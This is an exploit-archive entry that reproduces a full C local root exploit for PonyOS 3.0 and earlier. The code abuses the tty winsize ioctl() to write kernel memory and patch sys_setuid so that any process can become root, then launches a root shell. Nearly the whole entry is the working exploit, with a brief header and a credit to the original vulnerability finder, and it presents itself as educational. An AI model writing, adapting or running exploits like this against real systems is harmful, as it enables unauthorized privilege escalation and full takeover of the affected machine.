PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit

2015-06-02T00:00:00
ID 1337DAY-ID-23689
Type zdt
Reporter Hacker Fantastic
Modified 2015-06-02T00:00:00

Description

Exploit for linux platform in category local exploits

                                        
                                            # Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit
# Google Dork: [if applicable]
# Date: 29th June 2015
# Exploit Author: HackerFantastic
# Vendor Homepage: www.ponyos.org
# Software Link: [download link if available]
# Version: [app version] PonyOS <= 3.0
# Tested on: PonyOS 3.0
# CVE : N/A
 
# Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c
 
/* PonyOS <= 3.0 tty ioctl() root exploit
  ========================================
  PonyOS 0.4.99-mlp had two kernel vulnerabilities
  disclosed in April 2013 that could be leveraged 
  to read/write arbitrary kernel memory. This is 
  due to tty winsize ioctl() allowing to read/write
  arbitrary memory. This exploit patches the setuid
  system call to remove a root uid check allowing
  any process to obtain root privileges. 
 
  John Cartwright found these flaws and others here:
  https://www.exploit-db.com/exploits/24933/
 
  Written for educational purposes only. Enjoy!  
 
   -- prdelka
 
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
 
int main(){
    struct winsize ws;
    printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n");
    memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8);
    ioctl(0, TIOCSWINSZ, &ws);
    ioctl(0, TIOCGWINSZ, (void *)0x0010f101);
    printf("[-] patched sys_setuid()\n");
    __asm("movl $0x18,%eax");
    __asm("xorl %ebx,%ebx");
    __asm("int $0x7F");
    printf("[-] Got root?\n");
    system("/bin/sh");
}

#  0day.today [2018-04-12]  #